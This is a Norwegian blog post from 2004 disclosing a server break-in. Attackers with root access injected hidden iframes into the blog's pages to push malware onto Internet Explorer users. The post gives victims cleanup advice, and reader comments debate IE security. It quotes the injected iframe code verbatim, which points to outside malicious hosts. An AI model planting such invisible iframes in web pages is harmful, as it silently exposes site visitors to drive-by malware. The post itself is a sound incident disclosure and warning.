- Forrige: Dingsedilla
- Neste: Design
2004-02-20 16:57
Er du Internett Explorer-bruker og har besøkt denne bloggen i tidsrommet 13:00 til 16:30 den 20. februar må du lese hele denne meldingen, og du må følge instruksjonene i bunnen av meldingen.
Dette er det ikke gøy å måtte meddele, kjære leser. I dag, omkring klokka 13:00 ble det foretatt innbrudd på en av Webhusets maskiner. Nærmere bestemt maskinen denne bloggen står på.
Det som har skjedd er at noen har skaffet seg root-tilgang på maskinen, og endret alle index.html-dokumenter på maskinen, ved å sette inn følgende kode på alle sidene:
<IFRAME
SRC="http://www.forced-action.com/?d=get"
WIDTH="1" HEIGHT="1"></IFRAME>Det aktuelle dokumentet denne iframen peker på, inneholder tre nye usynlige iframes:
<IFRAME
SRC="http://mikefox.ud-dial.biz/connect.cgi" WIDTH=0 BORDER=0
HEIGHT=0></IFRAME>
<iframe src="tool.html" width=1 height=1></iframe>
<IFRAME
SRC="http://ttvqt.selfbookmark.info/enter.cgi?id=1929" WIDTH=1
HEIGHT=1></IFRAME>En whois på de tre impliserte domenene peker til henholdvis Latvia, Panama og Russland — så det virker for meg som det er organisert virksomhet som står bak.
Selve innbruddet er gjort på serveren denne maskinen står på, og de har skaffet seg root-tilgang på boksen (for den ikke-innvidde: De har kunnet gjøre akkurat som de ville), og selve infiseringen ser ut til å ha vært fullstendig automatisert.
Med andre ord: Disse folkene virker organisert, og motivet har åpenbart vært å tjene penger, så dette er ikke den helt alminnelige scriptkiddien som ynder å kline sin «0wn3d» utover allverdens servere, snarere et gjeng med organisert kriminelle kryp.
Først: Installer programmet Spybot Search & Destroy og la det søke gjennom og avinstallere svineriet som eventuelt er blitt installert.
Deretter: Gå til Trends online virussjekk og kjør en sjekk av maskinen.
Til sist: Installer en annen nettleser enn Internet Explorer. De to eneste grafiske nettleserne jeg anbefaler er Opera eller Mozilla Firefox.
Merk, du kan også være sårbar om du har brukt en av de mange nettleserne som bruker Internet Explorers visningsmotor. Du er altså ikke nødvendigvis trygg om du bruker nettlesere som MyIE2, AvantBrowser, SlimBrowser eller iRider.
Til sist: Jeg beklager det ubehaget dette har skapt for de av leserne mine både med og uten Internet Explorer, og håper dere kommer tilbake, uten frykt og med ny og sikrere webleser.
Til sist: Takk til Line, som tok seg bryet med å både sende SMS og ringe når hun oppdaget at det var noe muffens med sida. Uten henne hadde jeg ikke oppdaget dette før mandag.
Og det demonstrerer enda et poeng: Oppdater systemet ditt! Et oppdatert system vil ikke få noe dritt inn som følge av dette.
Oppdatering er egentlig alltid en god regel, men spesiellt viktig hvis man kjører Windows og/eller Internet Explorer, som har en mildt sagt varierende sikkerhetshistorikk.
Altså, joda, oppdatering er en fin ting—-men allikevel vil jeg påstå at det enkleste er å heller finne en annen nettleser.
Det er enklere med en annen nettleser, ja - men det frir deg ikke fra oppdateringer. Det var bare det som var poenget mitt.
Når det kommer til stykke så er vel poenget hvorvidt man kjører Windows som operativsystem eller ikke? Det gjør jeg. Min favoritt nettleser bytter fra dag til dag med å enten være Opera eller Mozilla, men jeg bruker IE aktivt i forbindelse med nettsider jeg utvikler. Når det kommer til stykke så har IE røttene sine så dypt ned i operativsystemet at det er en sikkerhetsrisiko uavhengig av om man bruker IE eller ikke, risikoen burde selvfølgelig bli mindre om man ikke bruker IE.
Som en avslutningsvits så tenker jeg dette høyt: IE på ett Windows krever mye mer av brukeren enn det andre løsninger gjør, hvis brukeren ikke skal være sårbar for alskens farligheter når de er tilkoblet Internett. Microsoft tar tydeligvis ikke sitt, selvfølgelige, ansvar alvorlig nok - jeg synes de burde vært stilt til ansvar for store deler av kostnadene samfunnet har blitt påført ved at folk flest, altså den jevne bruker, bruker deres produkter uten å inneha noen spesialkunnskaper om Internett generelt - og det måtte da også være for mye å forlange av dem. Microsoft har ansvaret! Men hva gjør de for å sikre sine kunders trygghet på Internett, ingenting?
Som jeg skriver i samme engelske rant på Virtuelvis, er det Microsoft (og ikke nødvendigvis bare Internet Explorer) som har skylda. Skillet mellom MS og IE er kanskje ikke så stort for bruker-Jon, men jeg mener altså at det er Microsofts generelle sikkerhetspolitikk som er problemet her, noe som gjennomsyrer alle applikasjonene de har laget (ikke nødvendigvis lager, for de har blitt flinkere), inklusivt Internet Explorer.
Jeg vil bare komme med en liten kommentar til “Spybot Search & Destroy” som du henviser til. Jeg har selv lastet ned og installert det, og i utgangspunktet var jeg fornøyd. Men det var kun frem til jeg prøvde Spybot med den norske oversettelsen, sjelden har jeg opplevd noe som er så dårlig oversatt til norsk. Noen burde kanskje gjøre forfatteren av programmet oppmerksom dette, for det gir et muligens feilaktig og dårlig bilde av programmet, som jeg forøvrig likte godt.
Jeg tror egentlig ikke at Internet Explorer er noe mindre sikker enn andre browsere, men når ca. 85%* bruker IE, er det klart det er mot IE man lager faenskap. Hadde det vært Opera som hadde 80% av brukermassen, hadde det også vært Opera folk hadde klagd på.
*) http://www.w3schools.com/browsers/browsers_stats.asp
Pål Joakim: Det er forholdsvis store forskjeller på arkitekturen i f.eks. Opera og MSIE. Mens Opera har et vanntett skille mellom browser og operativsystem, så er IE tett integrert med operativsystemet, og man har, som utvikler tilgang på hele systemet gjennom f.eks. ActiveX-kontroller som i visse tilfeller installeres automatisk.
Mange av exploitene som er laget for IE går på å få browseren til å tro at en forespørsel om for eksempel å skrive til filsystem eller installere ActiveX-kontroller automatisk er ved å tro at IE er i en av de “sikre sonene”.
I alternative nettlesere, som Opera og Mozilla, finnes ingen “sikker sone” - og browserne automatiserer ikke installasjon av slikt. Dermed vil aldri disse nettleserne bli like sårbare, og du vil ikke se like mye faenskap om det er Opera som ender opp med 90% av markedet.
Grunnen til at det ble slik? Microsoft så vel for seg nettleseren som mer en applikasjonsplattform og (fullstendig) integrasjon mellom nett og PC.
Det er ikke åpent for å legge til flere kommentarer.
Kommentar fra Geir 2004-02-21 21:45
Dette demonstrerer et godt poeng til. Hackere/crackere er ikke dumme. De er faktisk ganske glupe!
Da er det værre med oss tullinger som aldri lærer. (Arve kan se at denne kommentaren er skrevet inn ved hjelp av, nettopp, IE…)
Mitt, og mange andres, problem er latskap. Hvorfor bruke 2 minutter av sitt liv til å legge inne en ny browser? IE gjør ting latterlig enkelt. Dessverre ikke bare for brukeren, men også for enhver ondsinna f**n med en PC.
Kommentar #1453